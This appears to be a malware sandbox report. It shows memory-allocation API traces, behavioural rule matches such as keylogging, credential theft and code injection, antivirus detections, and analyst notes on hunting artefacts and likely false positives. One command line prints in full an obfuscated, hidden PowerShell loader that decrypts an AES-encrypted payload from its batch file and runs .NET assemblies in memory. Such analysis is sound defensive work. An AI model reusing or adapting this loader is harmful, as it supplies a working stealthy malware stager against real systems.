protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ce000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029cf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (Note: the literal, unexpanded `%ProgramData%` appended to the Temp directory suggests the batch built this path from a variable that was not expanded; a Temp path containing a literal `%ProgramData%` segment is a usable hunting artefact for this loader, though what the .lnk is used for is not shown here.)
cmdline C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat
Time & API Arguments Status Return Repeated
(Note: LookupPrivilegeValueW only resolves SeDebugPrivilege to its LUID; on its own it neither enables nor grants the privilege — that would require an AdjustTokenPrivileges call, which is not shown. Treat the "Escalate priviledges" tag as a weak signal on this evidence.)

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Steal credential rule local_credential_Steal
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Steal credential rule local_credential_Steal
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
cmdline "C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat.exe" -w hidden -c $pEMo='TraMBJvnsfMBJvorMBJvmFMBJvinaMBJvlBlMBJvoMBJvckMBJv'.Replace('MBJv', '');$iyaC='LMBJvoMBJvadMBJv'.Replace('MBJv', '');$tcQw='RMBJveadLMBJviMBJvneMBJvsMBJv'.Replace('MBJv', '');$KuMS='CMBJvhMBJvangMBJveEMBJvxMBJvtenMBJvsioMBJvnMBJv'.Replace('MBJv', '');$trmt='CreMBJvateDMBJvecMBJvrMBJvypMBJvtorMBJv'.Replace('MBJv', '');$fUaA='GeMBJvtMBJvCurMBJvrentMBJvProMBJvcMBJveMBJvssMBJv'.Replace('MBJv', '');$jFAl='EMBJvleMBJvmeMBJvntAMBJvtMBJv'.Replace('MBJv', '');$GMsR='SplMBJvitMBJv'.Replace('MBJv', '');$SgZi='EntMBJvrMBJvyMBJvPMBJvoMBJvinMBJvtMBJv'.Replace('MBJv', '');$AotJ='FrMBJvomBaMBJvsMBJve6MBJv4StMBJvriMBJvngMBJv'.Replace('MBJv', '');$NumX='MMBJvainMBJvModMBJvulMBJveMBJv'.Replace('MBJv', '');$SCtU='IMBJvnvMBJvokMBJveMBJv'.Replace('MBJv', '');function gYYuy($Ztzwf){$NuTmR=[System.Security.Cryptography.Aes]::Create();$NuTmR.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NuTmR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NuTmR.Key=[System.Convert]::$AotJ('9RE7z9qQbXo70lNlRZf0jPT2QRG4KCsVkZBJkUBk4l4=');$NuTmR.IV=[System.Convert]::$AotJ('A1++iPLzbLBcVKc2yItI3g==');$BvNdb=$NuTmR.$trmt();$wrDar=$BvNdb.$pEMo($Ztzwf,0,$Ztzwf.Length);$BvNdb.Dispose();$NuTmR.Dispose();$wrDar;}function pFMIH($Ztzwf){$XcMqn=New-Object System.IO.MemoryStream(,$Ztzwf);$ffVFP=New-Object System.IO.MemoryStream;$MiwFe=New-Object System.IO.Compression.GZipStream($XcMqn,[IO.Compression.CompressionMode]::Decompress);$MiwFe.CopyTo($ffVFP);$MiwFe.Dispose();$XcMqn.Dispose();$ffVFP.Dispose();$ffVFP.ToArray();}$uxbhR=[System.Linq.Enumerable]::$jFAl([System.IO.File]::$tcQw([System.IO.Path]::$KuMS([System.Diagnostics.Process]::$fUaA().$NumX.FileName, $null)), 1);$XmldQ=$uxbhR.Substring(2).$GMsR(':');$bUPcU=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[0])));$LzWhx=pFMIH (gYYuy 
([Convert]::$AotJ($XmldQ[1])));[System.Reflection.Assembly]::$iyaC([byte[]]$LzWhx).$SgZi.$SCtU($null,$null);[System.Reflection.Assembly]::$iyaC([byte[]]$bUPcU).$SgZi.$SCtU($null,$null);
cmdline C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat
Avast BV:Obfuscated-N [Cryp]
BitDefender Trojan.GenericKD.67626610
MicroWorld-eScan Trojan.GenericKD.67626610
Emsisoft Trojan.GenericKD.67626610 (B)
VIPRE Trojan.GenericKD.67626610
FireEye Trojan.GenericKD.67626610
GData Trojan.GenericKD.67626610
Arcabit Trojan.Generic.D407E672
Microsoft Trojan:Win32/Vigorf.A
MAX malware (ai score=80)
AVG BV:Obfuscated-N [Cryp]
Process injection Process 2644 resumed a thread in remote process 2756 (Note: per the process tree, 2756 is the cmd.exe child spawned by 2644, so an NtResumeThread on it is consistent with ordinary child-process start-up; treat the "Process injection" label as a probable false positive unless a memory write into 2756 is also shown.)
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2756
1 0 0